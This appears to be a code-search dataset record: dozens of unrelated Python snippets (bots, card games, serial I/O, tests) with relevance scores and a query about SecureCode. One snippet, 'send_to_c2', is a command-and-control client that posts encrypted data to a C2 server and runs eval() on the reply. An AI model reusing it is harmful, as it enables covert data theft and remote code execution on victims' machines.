\"\\u2666\" # Diamond\r\n else:\r\n suit = \"\\u2663\" # club\r\n\r\n num = c[1]\r\n if num == 11:\r\n num = 'J'\r\n elif num == 12:\r\n num = 'Q'\r\n elif num == 13:\r\n num = 'K'\r\n else:\r\n num = str(num)\r\n\r\n string = string + num + suit + ' '\r\n return string", "async def iasip_title_card(self, ctx: Context, *, title: str) -> None:\n\n async with ctx.channel.typing():\n if not title.startswith('\"'):\n title = '\"' + title\n\n if not title.endswith('\"'):\n title += '\"'\n\n buffer = await image_utils.title_card_generator(title)\n\n try:\n await ctx.send(file=discord.File(buffer, filename=\"iasip.png\"))\n except discord.HTTPException as e:\n bot_logger.error(f'File Send Failure. {e.status}. {e.text}')\n await ctx.send(f'Could not send image. Details: [Status {e.status} | {e.text}]')\n return", "def non_secret_char(c):\n return c", "def print_character(name):\n character = shared_functions.find_character(name)\n if not character:\n return discord.Embed(title=\"Invalid character\")\n embed = discord.Embed(title=character[\"Name\"], description=character[\"Backstory\"],\n color=int(character[\"Color\"], 16))\n embed.add_field(name=\"**Strongness**\", value=character[\"Strongness\"])\n embed.add_field(name=\"**Smartness**\", value=character[\"Smartness\"])\n embed.add_field(name=\"**Coolness**\", value=character[\"Coolness\"])\n embed.add_field(name=\"**Health**\", value=character[\"Health\"])\n embed.add_field(name=\"**Gold**\", value=character[\"Gold\"])\n traits_field = \"\"\n for trait in character[\"Traits\"]:\n try:\n traits_field += traits.trait_dict[trait].print() + \"\\n\"\n except KeyError:\n traits_field += traits.boss_trait_dict[trait].print() + \"\\n\"\n embed.add_field(name=\"__**Traits**__\", value=traits_field)\n # TODO: Implement support in print_character for blessings that aren't unlocked.\n # None are currently implemented, so it can wait.\n if character[\"Blessing\"] in traits.blessing_dict:\n embed.add_field(name=\"__**Blessing**__\", value=traits.blessing_dict[character[\"Blessing\"]].print())\n else:\n if character[\"Blessing\"] != \"No blessing\":\n embed.add_field(name=\"__**Blessing**__\", value=\"**\" + character[\"Blessing\"] + \"**: ????\")\n inventory_string = \"\"\n for item in character[\"Inventory\"]:\n if item != \"Empty slot\":\n if name in npcs.keys():\n inventory_string += \"**Unknown item**: ???\\n\"\n else:\n item = items.item_dict[item]\n inventory_string += \"- \" + item.print() + \"\\n\"\n else:\n inventory_string += \"- Empty slot\\n\"\n embed.add_field(name=\"__**Inventory**__\", value=inventory_string)\n shared_functions.backup_characters()\n return embed", "def write(self, frame):\n super(TCPKISS, self).write(frame.encode_kiss())", "def test_repr(self):\n self.assertEqual(repr(self.card), \"A of Spades\")", "async def show_card(self, ctx, card: dict):\r\n emb = discord.Embed(\r\n title=card['name'],\r\n colour=discord.Colour.dark_purple(),\r\n url='https://roll20.net/compendium/dnd5e/Deck%20of%20Many%20Things#content',\r\n description=card['desc']\r\n )\r\n emb.set_footer(text='Use [p]domt info for list of all cards.')\r\n emb.set_image(url=card['img'])\r\n await ctx.send(embed=emb)", "def send_text_to_user(user):", "def card(phenny, input):\n if not input.group(2):\n phenny.say(input.nick + 'Perhaps you meant \".card Storm Crow\"?')\n else:\n card_name = input.group(2).strip().lower().title()\n if card_name in nick.nicknames:\n card_name = nick.nicknames[card_name]\n card_text = get_card(card_name)\n if card_text:\n phenny.reply(card_text)\n else:\n phenny.reply(\"I could not find a card by that name.\")", "def test_sendUnicodeCommand(self):\n self.p.sendCommand(\"CMD\", (\"param\\u00b9\", \"param\\u00b2\"))\n self.check(b\"CMD param\\xc2\\xb9 param\\xc2\\xb2\\r\\n\")", "def _encode_supplement(self):", "def _encode_supplement(self):", "def open_quote(self):\n self.message += '{'", "def test_post_special_characters(self):\n self.is_authenticated()\n response = self.post_special_characters()\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"error\"], \"You cannot post special characters\")", "def sendOTP(code):\n # Modify the code here to change from print to any output \n print(\"Your OTP is \" + code + \". Kindly do not share it with anyone\")", "def test_escape_semicolon(self):\n card = Card(\n \"mocking\",\n \"ˈmɑkɪŋ\",\n \"Making fun of someone or something in a cruel way; derisive.\",\n \"The ruthless scientist changed from mocking to sad.\",\n )\n\n expected = (\n \"The ruthless scientist changed from <b>mocking</b> to sad.; \"\n '\"<b>mocking /ˈmɑkɪŋ/</b><br> Making fun of someone or '\n 'something in a cruel way; derisive.\"'\n )\n\n self.assertEqual(card.to_anki_txt_format(), expected)", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def __str__(self):\n result = ''\n for c in self._cards:\n result = result + str(c) + '\\n'\n return result", "def message(self, text):\n\n if( rpi_device ):\n self.clear()\n for char in text:\n if char == '\\n' or char == '^':\n self.cmd(0xC0) # new line\n else:\n self.cmd(ord(char),True)", "def send_string(self, code_num, msg):\n self.client.send(f\"{code_num}_{msg}\".encode())", "def write(self, frame):\n super(SerialKISS, self).write(frame.encode_kiss())", "def embed(self):\n\n # aliases\n CARDS = self.game.emojis\n U200B = self.game.u200b_ZWSP\n U3000 = self.game.u3000_IS\n U2022 = self.game.u2022_bullet\n\n # combinations\n LF = f'\\n{U200B}'\n LFLF = f'{U200B}\\n{U200B}'\n BULLET_SEP = f'{U3000}{U2022}{U3000}'\n\n # helper functions\n spacer = lambda n: f'{U200B}{U3000 * n}{U200B}'\n pad_right = lambda n: f'{U3000 * n}{U200B}'\n pad_left = lambda n: f'{U200B}{U3000 * n}'\n\n hand: BlackjackDealerHand = self.game.dealer_hand\n\n if self.game.dealer_status == 'Busted':\n title_status = ' Busted'\n else:\n title_status = \"'s Turn\"\n title = f\"{U200B}\\n**__Kaa (Dealer){title_status}__**{LF}\"\n embed = discord.Embed(\n # title=f\"**{player['name']}**{LF}\",\n title=title,\n color=self.game.embed_color,\n )\n\n # blackjack title and icon\n embed.set_author(\n name='Blackjack' + pad_right(30),\n icon_url=self.game.thumbnail_url,\n )\n\n # footer showing current player pic, and the position in queue\n text = (\n f'Phase 5: Dealer Turn{BULLET_SEP}'\n f'Game will continue momentarily'\n )\n embed.set_footer(\n icon_url=self.game.bot.user.avatar_url,\n text=text,\n )\n\n\n # dealer cards field\n name = 'Cards'\n value = ''\n card: Card\n for card in hand.iter_all():\n value += CARDS[card.format_short()]\n embed.add_field(name=name, value=value, inline=True)\n\n # blank field for formatting\n embed.add_field(\n name=U200B,\n value=U200B,\n inline=True,\n )\n\n name = 'Hard[/Best]'\n # value = f'{pad_left(1)}{hand.value_hard}'\n value = f'{hand.value_hard}'\n if hand.value_hard != hand.value:\n value += f'/{hand.value}'\n if self.game.dealer_status == 'Busted':\n value += ' (Busted)'\n value += LF # added for bottom padding\n\n embed.add_field(name=name, value=value, inline=True)\n\n\n\n\n # players\n name = 'Players'\n value = self.player_hands\n embed.add_field(name=name, value=value, inline=True)\n\n # blank field for formatting\n embed.add_field(name=U200B, value=U200B, inline=True)\n\n name = U200B\n value = self.player_values\n embed.add_field(name=name, value=value, inline=True)\n\n return embed", "def armbuy(self):\n\t\tthismsg = \"\\r\\n\"+self.ESC+\"12C\"+self.ESC+\"1;33m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;33m\"+self.A220+self.A220+self.ESC+\"1m\"+self.A220+self.ESC+\"0;33m\"+self.A220+self.ESC+\"1m\"+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\"+self.A223+self.ESC+\"2C\"+self.ESC+\"37m The\"+self.ESC+\"CSaga\"+self.ESC+\"Cof\"+self.ESC+\"Cthe\"+self.ESC+\"CRed\"+self.ESC+\"CDragon\"+self.ESC+\"C-\"+self.ESC+\"C\"+self.ESC+\"33mArmour\"+self.ESC+\"CList \"+self.ESC+\"2C\"+self.A220+self.ESC+\"47m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"47m\"+self.A178+self.A219+self.ESC+\"40m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;33m\"+self.A223+self.A223+self.ESC+\"1m\"+self.A223+self.ESC+\"0;33m\"+self.A223+self.ESC+\"1m\"+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.A223+self.ESC+\"47m\"+self.A178+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"4C\"+self.ESC+\"40mArmour\"+self.ESC+\"25CPrice\"+self.ESC+\"8C\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;33m1.\"+self.ESC+\"CCoat\"+self.ESC+\"1;30m...................................\"+self.ESC+\"33m200\"+self.ESC+\"C\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;33m2.\"+self.ESC+\"CHeavy\"+self.ESC+\"CCoat\"+self.ESC+\"1;30m...........................\"+self.ESC+\"33m1,000\"+self.ESC+\"C\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A219+self.ESC+\"2C\"+self.ESC+\"0;33m3.\"+self.ESC+\"CLeather\"+self.ESC+\"CVest\"+self.ESC+\"1;30m.........................\"+self.ESC+\"33m3,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A178+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A178+self.ESC+\"2C\"+self.ESC+\"0;33m4.\"+self.ESC+\"CBronze\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.......................\"+self.ESC+\"33m10,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A177+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A177+self.ESC+\"2C\"+self.ESC+\"0;33m5.\"+self.ESC+\"CIron\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.........................\"+self.ESC+\"33m30,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"0;33m\"+self.A223+self.ESC+\"2C6.\"+self.ESC+\"CGraphite\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m....................\"+self.ESC+\"33m100,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A223+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A176+self.ESC+\"2C7.\"+self.ESC+\"CErdrick's\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m...................\"+self.ESC+\"33m150,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A176+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A177+self.ESC+\"2C8.\"+self.ESC+\"CArmour\"+self.ESC+\"Cof\"+self.ESC+\"CDeath\"+self.ESC+\"1;30m....................\"+self.ESC+\"33m200,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A177+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A178+self.ESC+\"2C9.\"+self.ESC+\"CAble's\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m......................\"+self.ESC+\"33m400,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A178+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C10.\"+self.ESC+\"CFull\"+self.ESC+\"CBody\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.................\"+self.ESC+\"33m1,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A223+self.ESC+\"C11.\"+self.ESC+\"CBlood\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m.....................\"+self.ESC+\"33m4,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C12.\"+self.ESC+\"CMagic\"+self.ESC+\"CProtection\"+self.ESC+\"1;30m................\"+self.ESC+\"33m10,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A220+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C13.\"+self.ESC+\"CBelar's\"+self.ESC+\"CMail\"+self.ESC+\"1;30m....................\"+self.ESC+\"33m40,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C14.\"+self.ESC+\"CGolden\"+self.ESC+\"CArmour\"+self.ESC+\"1;30m..................\"+self.ESC+\"33m100,000,000\"+self.ESC+\"C\"+self.ESC+\"0;33m\"+self.A219+\"\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.A219+self.ESC+\"C15.\"+self.ESC+\"CArmour\"+self.ESC+\"COf\"+self.ESC+\"CLore\"+self.ESC+\"1;30m.................\"+self.ESC+\"33m400,000,000\"+self.ESC+\"C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"40m\\r\\n\"\n\t\tthismsg += self.ESC+\"12C\"+self.ESC+\"43m\"+self.A176+self.ESC+\"0;33m\"+self.A219+self.A220+self.A220+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A176+self.A220+self.A220+self.A178+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.ESC+\"C\"+self.A220+self.A220+self.A221+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A176+self.ESC+\"C\"+self.A220+self.A220+self.A220+self.A220+self.A178+self.A220+self.A220+self.A220+self.A220+self.A219+self.ESC+\"1;43m\"+self.A176+self.ESC+\"40m\"+self.ESC+\"0m\\r\\n\"\n\t\treturn thismsg", "def encode_message(self, **kwargs):\r\n\r\n\t\tif kwargs[\"action\"] == \"NO\":\r\n\r\n\t\t\tself.send_message(\"|%s|%s|\" % (kwargs[\"action\"], kwargs[\"selected_name\"]))\r\n\r\n\t\telif kwargs[\"action\"] in [\"ME\",\"UR\"]:\r\n\r\n\t\t\tself.send_message(\"|%s|%s|\" % (kwargs[\"action\"], kwargs[\"message\"]))\r\n\r\n\t\telif kwargs[\"action\"] == \"LA\":\r\n\r\n\t\t\tself.send_message(\"|LA|\")\r\n\r\n\t\telif message_split[0] == \"CH\":\r\n\r\n\t\t\tpass\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tself._window.open_dialog(\"Impossible d'envoyer un message\",\r\n\t\t\t\t\t\t\t\t\t \"Le message suivant n'a pas pu être envoyé car mal encodé : {}\".format(kwargs),\r\n\t\t\t\t\t\t\t\t\t type=\"warning\")\r\n\t\t\tprint(\"Error during encoding with arguments : %s\" % kwargs)", "def absenden(self):\n\n message = self.textFeld.toPlainText()\n self.c.send(message)\n self.textFeld.clear()", "def Send_newCards(self, cards): \n serialized = [c.serialize() for c in cards]\n self.Send({\"action\": \"newCards\", \"cards\": serialized})", "def sendPDU(self, pdu):\n # this operation does not verify the contents of the DU\n self.send(pdu.getBufferString())", "def __init__(self, char_name, char_description):\r\n self.name = char_name\r\n self.description = char_description\r\n self.conversation = None\r\n self.bribe = None", "def cardholder_name(self):\n return self.__cardholder_name", "def test_contains_nonprintable_characters(self):\n result = attributeAsLDIF(b\"key\", b\"val\\xFFue\")\n self.assertEqual(result, b\"key:: %s\\n\" % encode(b\"val\\xFFue\"))", "def rock():\n typer.echo(\"🤖🤘\")", "def def_char(self, offset, data):\n self.send((\"\\x1b\\x26\\x01%c%c\\x05\") % ((offset&0xff), (offset&0xff)))\n time.sleep(0.01)\n for i in data:\n self.send((\"%c\")%i)", "def encode_text():\n print(f\"{YELLOW}[{MIDDLE_DOT}]{RESET} Enter message to encode: \", end=\"\")\n message = input()\n encoded = LEFT_TO_RIGHT_MARK\n for message_char in message:\n code = '{0}{1}'.format('0' * padding, int(str(to_base(\n ord(message_char), len(zero_space_symbols)))))\n code = code[len(code) - padding:]\n for code_char in code:\n index = int(code_char)\n encoded = encoded + zero_space_symbols[index]\n\n encoded += RIGHT_TO_LEFT_MARK\n\n pyperclip.copy(encoded)\n print(f\"{GREEN}[+]{RESET} Encoded message copied to clipboard. {GREEN}[+]{RESET}\")", "def sendPDU(self, pdu):\n # this operation does not verify the contents of the PDU\n self.send(pdu.getBufferString())", "def sndString(self, str):\r\n\t\tfor ch in str:\r\n\t\t\tself.ser.write(ch)\r\n\t\t\t# ritardo tra un invio e il successivo\r\n\t\t\tsleep(self.dlTx)\r\n\t\t# debug\r\n\t\tif self.deb:\r\n\t\t\tprint \"send:\",\r\n\t\t\tprintHex(str)", "async def fuckedd (abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n index = random.randint(0, len(memes.ABUSEHARD_STRING) - 1)\n reply_text = memes.ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "async def fuckedd(abusehard):\n if not abusehard.text[0].isalpha() and abusehard.text[0] not in (\n \"/\",\n \"#\",\n \"@\",\n \"!\",\n ):\n index = random.randint(0, len(ABUSEHARD_STRING) - 1)\n reply_text = ABUSEHARD_STRING[index]\n await abusehard.edit(reply_text)", "def send_to_c2(msg: str) -> str:\n msg_as_ord = [ord(c) for c in msg]\n msg_encrypted = crypt1(msg_as_ord)\n resp = requests.post(C2_URL, data=str(msg_encrypted))\n if resp.status_code != 200:\n print('Got status code', resp.status_code)\n return None\n\n raw_resp = resp._content.decode('utf-8')\n encrypted_list = eval(raw_resp)\n decrypted_list = crypt1(encrypted_list)\n return ''.join([chr(i) for i in decrypted_list])", "def barcode_message( self, ucode ):\n\t\tassert isinstance( ucode, unicode ), \"the code to compute in barcode must be a unicode string\" \n\n\t\tfor uchar in ucode:\n\t\t\tif not( uchar in self._char39 ):\n\t\t\t\traise Barcode39Error( '%s char is not listed in Barcode39 characters [0..9,A..Z,space,9,-,.,$,/,+,%]' )\n\t\n\t\treturn u'*%s*' % ucode.strip()", "async def printtext(self, ctx: discord.ext.commands.Context, *args):\n message_channel: discord.abc.Messageable = ctx.message.channel\n if len(args) == 1:\n received_string = args[0]\n if received_string.startswith('\"') and received_string.endswith('\"'):\n received_string = received_string[1:-1]\n pos = received_string.find(\"\\\\\")\n if pos != -1 and received_string[pos + 1] != \" \":\n print(\"Error:\" + received_string[pos + 1])\n return\n pos = received_string.find(\"\\\"\")\n if pos != -1:\n print(\"Error:\" + received_string[pos + 1])\n return\n final_string = \"\"\n number_emoji = self.botVariables.numbers_emoji\n for c in received_string:\n if c.isalnum():\n try:\n val = int(c)\n if val < 10:\n final_string += number_emoji[val] + \" \"\n else:\n print(\"fatal Error!!!-\" + str(val))\n except ValueError:\n c = c.lower()\n if c == \"è\" or c == \"é\" or c == \"à\" or c == \"ù\" or c == \"ì\":\n final_string += c + \" \"\n else:\n final_string += \":regional_indicator_\" + c + \":\" + \" \"\n else:\n if c == \"!\" or c == \"?\" or c == \"#\":\n if c == \"!\":\n final_string += \":exclamation:\" + \" \"\n else:\n if c == \"#\":\n final_string += \":hash:\" + \" \"\n else:\n final_string += \":question:\" + \" \"\n else:\n final_string += c + \" \"\n await message_channel.send(final_string)\n else:\n await message_channel.send(\n \"**Usage:** \" + self.command_prefix + \"printtext \\\"phrase\\\", for more see \"\n + self.command_prefix + \"help printtext\")", "def __str__(self):\n return f\"{self.deck}\"", "def cipher_feedback(self):", "def send_message(self, serial_message):\n #print(\"Sending message: %s\" % serial_message)\n self.sendString(serial_message)", "def characters(self, message):\n self._message = self._message + message", "def gateway(arg):\n\tassert isinstance(arg, str)\n\treturn r\"(?P<%s>[\\w_\\-@\\' \\.]+)\" % (arg,)", "async def decode(ctx, code: Option(str, \"Brainfuck code to decode into text\")):\n decoded = bot.brainfuck.decode(code)\n await send_code(ctx, decoded.text, lang=\"txt\", filename=\"text.txt\")", "async def cry(e):\n if not e.text[0].isalpha() and e.text[0] not in (\"/\", \"#\", \"@\", \"!\"):\n await e.edit(random.choice(CRI))", "def send_command(self, command):\n send_message = \"\"\n for i in command:\n send_message += chr(i)\n #send_message += bytes(i)\n\n for data in send_message:\n self.pymata.transport.write(data)", "def as_string(self):\n # Remove cards which have no definition\n cards = [card for card in self if card.definition is not None]\n # Remove cards which have no word\n cards = [card for card in cards if card.word]\n return \"\\n\".join([card.get_flashcard() for card in cards])", "def __repr__(self):\n r = '<Character id:%s[%s] name:_%s_>' % (self.characterID,\n self.accessSystem,\n self.get('name'))\n if isinstance(r, unicode): r = r.encode('utf_8', 'replace')\n return r", "def sn(self):\n\t\tstring = []\n\t\tresp = [0x00]\n\t\tself.spi.transfer([0x10], [0x00], 1)\n\t\ttime.sleep(9e-3)\n\t\tfor i in range(60):\n\t\t\tself.spi.transfer([0x00], resp, 1)\n\t\t\tstring.append(chr(resp[0]))\n\t\ttime.sleep(0.1)\n\t\treturn ''.join(string).strip()", "def test_str(self):\n character = self.character\n\n self.assertEqual(str(character), self.character_raw['name'])", "def decode(self, vcard):\n\n # pylint: disable=W0201\n self.content = vcard", "def for_description_enter_vlan_for_functional_testing_without_quotes(driver, description):\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').clear()\n driver.find_element_by_xpath('//input[@ix-auto=\"input__Description\"]').send_keys(description)", "def __str__(self):\n return f'({self.character})'", "def ascii_version_of_card(*cards):\n\n # we will use this to prints the appropriate icons for each card\n name_to_symbol = {\n 'Spades': '♠',\n 'Diamonds': '♦',\n 'Hearts': '♥',\n 'Clubs': '♣',\n }\n\n def card_to_string(card):\n # 10 is the only card with a 2-char rank abbreviation\n rank = card.rank if card.rank == '10' else card.rank[0]\n\n # add the individual card on a line by line basis\n return CARD.format(rank=rank, suit=name_to_symbol[card.suit])\n\n\n return join_lines(map(card_to_string, cards))", "def message(self, key):\n msg = '[ensime] ' + feedback[key]\n self.raw_message(msg)", "def escape(self):\n pass", "def __call__(self, text, defaultText='', failsafe=False, timeout=None, mode='Abc', orientation='portrait', delayBetweenPresses=None):\r\n if len(text):\r\n if self.phone.isFullBlackBox(): # input using hardcoded settings\r\n if self.blackBoxVkb == None:\r\n self.blackBoxVkb = BlackBoxVirtualKeyboard(self.phone)\r\n self.blackBoxVkb._writeBlackBox(text, mode=mode, orientation=orientation, delayBetweenPresses=delayBetweenPresses)\r\n else:\r\n self.write(text, defaultText,failsafe, timeout=timeout)\r\n else:\r\n self.phone.comment(\"Empty string given for input!\")", "def banner_ascii():\n print(\"\")\n print(f\"\\n{RED} Steganography Tool{RESET}\")\n print(f\"{RED} Made By {RESET}\")\n print(f\"{RED} Ehthe Samul Islam Laskar USN:1DS16CS712 {RESET}\")\n print(f\"{RED} B Padma USN:1DS19CS420{RESET}\")\n print(f\"{RED} Nikhil D Kanyal USN:1DS17CS731{RESET}\")\n print(f\"{YELLOW}Type 'help' to see commands{RESET}\")" ]
[ "0.6168183", "0.6085875", "0.5932747", "0.5859501", "0.55997914", "0.54294205", "0.5385542", "0.5369416", "0.53545773", "0.5346947", "0.5339747", "0.53114927", "0.52844477", "0.52821624", "0.5262677", "0.5241565", "0.52258605", "0.5219325", "0.52160716", "0.5215507", "0.5209636", "0.51984733", "0.5192304", "0.5183283", "0.51794285", "0.5176914", "0.5161202", "0.51587", "0.51341164", "0.5111776", "0.51098967", "0.51053226", "0.5091803", "0.50872815", "0.5083778", "0.507992", "0.5068954", "0.506785", "0.50611025", "0.50532246", "0.5052579", "0.50432765", "0.503638", "0.50320995", "0.5029896", "0.5026661", "0.5026469", "0.5014267", "0.50109655", "0.5010664", "0.4994271", "0.4983625", "0.4983625", "0.49743798", "0.4965721", "0.4957856", "0.4952946", "0.49489146", "0.49489146", "0.49470842", "0.4946758", "0.49449226", "0.49345046", "0.493408", "0.4930186", "0.49254015", "0.49251625", "0.4920344", "0.4917324", "0.4906297", "0.49057758", "0.49006134", "0.49005172", "0.48999548", "0.48901403", "0.48780227", "0.4869516", "0.48553362", "0.48539257", "0.48503053", "0.48478028", "0.48468176", "0.48454824", "0.48446864", "0.4844541", "0.48422736", "0.48342332", "0.4832424", "0.48312238", "0.48280278", "0.4825651", "0.48247945", "0.48245004", "0.48216912", "0.4819818", "0.48183414", "0.48178053", "0.48161492", "0.48113978", "0.4799152", "0.47977886" ]
0.0
-1
Send null value in SecureCode
def test_34(self): assert 'False' == Api.requestBlock('test-34')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encrypt():\n\tnull = 0", "def test_mask_secret_null():\n assert utils.mask_secrets(\"\", None) == \"\"", "def null() -> SetupVal:\n return NullVal()", "def noneType(value):\r\n return ''", "def silent_none(value):\n if value is None:\n return ''\n return value", "def nulltest():", "def encode_null_term(self, input):\n return input.encode() + b'\\x00'", "def assemblyRotationAlgorithmStringNone(_cs, name, value):\n if value == \"None\":\n value = \"\"\n\n return {name: value}", "def testNoneValue(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User',\n u'user@example.com')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.store.add(TagValue(user.id, tag.id, objectID, None))", "def run(self, value):\r\n return '' if value is None else value", "def _decode_none(value):\n return value", "def test_get_feedback_none(self):\n result = ''\n self.xblock.credit_dict = None\n test_result = self.xblock.get_feedback_message()\n self.assertEquals(result, test_result)", "def no_payment_required(self):", "def test_request_channel_is_none(self):\n CanInfo.objects.filter(can_id=self.UUID).update(channel_name=None)\n self.assertFalse(send_rotate_to_can(self.USER, self.BIN_NUM))", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def none(self):", "def test_user_is_none(self):\n self.assertFalse(send_rotate_to_can(None, self.BIN_NUM))", "def _nullify(self, value):\n if not str(value).strip():\n return None\n else:\n return value", "def _decode_null(bytes_data): # type: (bytes) -> any\n if len(bytes_data) != 0:\n raise ASN1SyntaxError('ASN1 syntax error')\n return None", "def honeycode(self) -> Optional[pulumi.Input['FlowDestinationFlowConfigDestinationConnectorPropertiesHoneycodeArgs']]:\n return pulumi.get(self, \"honeycode\")", "def create_code_without_password(self, phone):\r\n code = self.random_code(settings.CODE_LENGTH)\r\n # if phone in [\"+77753721232\", \"+77752470125\", \"+77074443333\"]:\r\n # code = \"4512\"\r\n # else:\r\n # code = \"%0.4d\" % random.randint(0, 9999)\r\n # mobizonproxy.send_sms(phone, text=u\"{} - Код активации для Pillowz365\".format(code))\r\n activation = Activation(phone=phone,\r\n to_reset=False,\r\n password=make_password(code),\r\n code=code)\r\n activation.save()\r\n return activation", "def ocsp_no_check(self, value):\n\n if value is None:\n self._ocsp_no_check = None\n else:\n self._ocsp_no_check = bool(value)", "def test_script_to_fs_empty_code():\n result = uflash.script_to_fs('', uflash._MICROBIT_ID_V1)\n assert result == ''", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def add_nil_values(self, coverage_id=None, value=None, reason=None):", "def enable_null_tracking(*args, **kwargs): # real signature unknown\n pass", "def get_prep_value(self, value):\n if value is not None:\n return 'base64:' + base64.encodestring(json.dumps(value))", "def _send_code(self, phone, code, case):\n raise NotImplementedError", "def nullValueToZero(self) -> None:\n self.cpp.nullValueToZero()", "def test_none(self):\n self.assertEqual(b\"\", self.successResultOf(to_xml(None)))", "def none_to_empty(data):\n return data if data is not None else ''", "def get(self):\r\n self.code = self.code.replace(\"PORT\", str(self.port))\r\n\r\n # Apply xor encoding.\r\n self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply base64 encoding.\r\n self.code = base64_wrapper(self.name, self.code, self.args)\r\n\r\n # Apply url-encoding\r\n if self.args.urlencode is True:\r\n self.code = to_urlencode(self.code)\r\n \r\n return self.code", "def null_enabled(self):\n return False", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> 